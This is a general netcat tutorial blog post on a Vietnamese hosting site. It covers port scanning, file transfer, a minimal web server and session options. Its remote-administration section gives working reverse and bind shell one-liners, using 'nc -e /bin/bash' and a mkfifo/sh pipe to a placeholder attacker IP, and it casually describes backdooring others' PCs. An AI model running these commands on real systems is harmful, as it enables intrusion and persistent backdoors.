Netcat – Swiss Army Knife Pro Usage

29/12/2020
Chưa phân loại
Netcat is a utility which is used for reading and writing data across TCP and UDP ports. It can be used for a lot of cool stuff like file transfer, port scanning, port redirecting, backdooring someone else’s PC, making a simple chat program, for network troubleshooting and more, that’s why it’s known as swiss army knife. Also it comes pre-installed with almost every Linux distribution nowadays and it is mainly used by Network Administrators, DevOps and Security Engineers for their daily small tasks.

A brief difference between netcat-traditional and netcat-openbsd

There are two similar packages available for netcat with a slight difference between them.

netcat-traditional includes an additional ‘-e’ option which can be used for binding a program (i.e bash) with netcat. This feature is very useful for remote administration purposes.

netcat-openbsd have some additional support for IPv6 and proxies.

Netcat Installation

Though netcat comes pre-installed in most Linux distributions but if its not, it can be installed easily using the following commands.

For traditional package,

ubuntu@ubuntu:~$ sudo apt-get install netcat-traditional

For openbsd version,

ubuntu@ubuntu:~$ sudo apt-get install netcat-openbsd

Netcat for Windows can be downloaded from here https://sourceforge.net/projects/nc110/files/.

Now we’ll explore some interesting use cases of netcat

Port Scanning using netcat

To scan for open ports, use ‘-z’ option. Netcat will try to connect to every port without sending any data or very limited data in UDP case. Type the following

ubuntu@ubuntu:~$ nc -z -v hackme.org 80
…snip…
hackme.org [217.78.1.155] 80 (http) open

To scan for a range of ports, type

ubuntu@ubuntu:~$ nc -z -nv 192.168.100.72 2080
(UNKNOWN) [192.168.100.72] 80 (http) open
(UNKNOWN) [192.168.100.72] 22 (ssh) open

File Transfer with netcat

Another useful use case of netcat is file transfer between remote computers. You can send texts and binary files from one PC to another PC. We’ll try to send a file “file.pdf” from Linux PC to Windows PC [IP 192.168.100.72] using netcat as an example.

On Windows machine (receiver), type the following

C:Users> nc -nvlp 1337 > file.pdf
Listening on [0.0.0.0] (family 2, port 1337)

On Linux machine (sender), type the following

ubuntu@ubuntu:~$ nc -nv 192.168.100.72 1337 < file.pdf
Connection to 192.168.100.72 1337 port [tcp/*] succeeded!

Remote Administration with netcat

One of the best use cases of netcat is remote administration, that means you can control someone else’s PC using netcat. Netcat-traditional comes with ‘-e’ option which can be used to bind a program (i.e cmd.exe in Windows or bash in Linux) with a port, that means netcat will act as communicator between the program and the remote PC. Netcat will receive commands from remote PC, execute on local system and will send the results back to the remote PC. This feature is widely used for malicious purposes, to keep backdoors in PCs and servers. This feature is only available in netcat-traditional but with a little trick, netcat-openbsd can also be used for the same purpose. You can use two ways to control others’ PC.

In a Reverse Shell connection,  an attacker listens on a port and waits for a connection to be sent from the victim machine. It is used when victim computer is behind NAT or doesn’t have public IP.

To get a reverse shell using netcat, you need to listen on a port using netcat. Type the following on the attacker machine,

ubuntu@ubuntu:~$ nc -nvlp 1337
Listening on [0.0.0.0] (family 2, port 1337)

On victim machine (if netcat-traditional is installed)

//replace “/bin/bash” with “cmd.exe” in case of Windows

ubuntu@ubuntu:~$ nc -nv [IP_ADDR] 1337 -e /bin/bash

For netcat-openbsd (where “-e” option isn’t supported)

ubuntu@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat
/tmp/f|/bin/sh -i 2>&1|nc [IP_ADDR] 1337 >/tmp/f

While in a Bind Shell connection, attacker binds a port on the victim machine and connects to that port using client socket. It is used when attacker’s machine is behind NAT or doesn’t have a public IP.

On victim machine, type

ubuntu@ubuntu:~$ nc -nlvp 1337 -e /bin/bash
listening on [any] 1337

Now, to run commands on the victim machine, type

ubuntu@ubuntu:~$ nc -nv 127.0.0.1 1337
Connection to 127.0.0.1 1337 port [tcp/*] succeeded!
$ id
uid=1000(azad) gid=1000(azad) groups=1000(azad),4(adm),24(cdrom),27(sudo),
30(dip),46(plugdev),118(lpadmin),129(sambashare)

Simple Web Server using netcat

You can also do another simple trick to use netcat as minimal single page web server. This web server would be very simple with no special configurations, and we’ll use to it send our HTML code to the browser.

ubuntu@ubuntu:~$ while true ; do  echo -e "HTTP/1.1 200 OKnn $(echo "<h1>
My Simple Webserver using netcat</h1>")" | nc -nvlp 1337  ; done
Listening on [0.0.0.0] (family 2, port 1337)

Now, try to fetch the webpage using curl

ubuntu@ubuntu:~$ curl http://127.0.0.1:1337/
<h1>My Simple Webserver using netcat</h1>

Specify Timeout for a netcat Session

You can specify timeout for a netcat session using “-w” option. Netcat will automatically disconnect its session after the specified time passes out.

// -w [Time in Seconds]
ubuntu@ubuntu:~$ nc -w 40 -nvlp 1337
Listening on [0.0.0.0] (family 2, port 1234)

Continue Listening even if Client closes the Connection

In normal mode, netcat server shuts down and stop listening on the port when a client closes the connection. You can keep the server up using “-k” option

ubuntu@ubuntu:~$ nc -k -nlvp 1234
Listening on [0.0.0.0] (family 2, port 1234)

Conclusion

Netcat is simple yet efficient utility which can be used for a lot of simple daily tasks. It comes pre-installed in almost every UNIX like operating systems and can be used for various tasks like communication between two PCs, file transfer and many more.

ONET IDC thành lập vào năm 2012, là công ty chuyên nghiệp tại Việt Nam trong lĩnh vực cung cấp dịch vụ Hosting, VPS, máy chủ vật lý, dịch vụ Firewall Anti DDoS, SSL… Với 10 năm xây dựng và phát triển, ứng dụng nhiều công nghệ hiện đại, ONET IDC đã giúp hàng ngàn khách hàng tin tưởng lựa chọn, mang lại sự ổn định tuyệt đối cho website của khách hàng để thúc đẩy việc kinh doanh đạt được hiệu quả và thành công.
Bài viết liên quan

Running PostgreSQL using Docker Compose

Docker-compose can be used to easily automate multi-container deployments. One of the most challenging tasks while running...
29/12/2020

Performance Testing [Phần 3] Hướng dẫn sử dụng Gatling Recoder

Gatling Recorder hỗ trợ người dùng sinh ra kịch bản test nhanh chóng bằng cách thu thập các request HTTP...
30/12/2020

How to Install SketchUp Make 2016 on Ubuntu, Linux Mint

This is a quick tutorial on how to install SketchUp Make 2016 on Linux. For those who may not know, SketchUp Make 2016 (Formerly...
28/12/2020
Bài Viết

Bài Viết Mới Cập Nhật

SỰ KHÁC BIỆT GIỮA RESIDENTIAL PROXY VÀ PROXY DATACENTER
17/02/2024

Mua Proxy v6 US Private chạy PRE, Face, Insta, Gmail
07/01/2024

Mua shadowsocks và hướng dẫn sữ dụng trên window
05/01/2024

Tại sao Proxy Socks lại được ưa chuộng hơn Proxy HTTP?
04/01/2024

Mua thuê proxy v4 nuôi zalo chất lượng cao, kinh nghiệm tránh quét tài khoản zalo
02/01/2024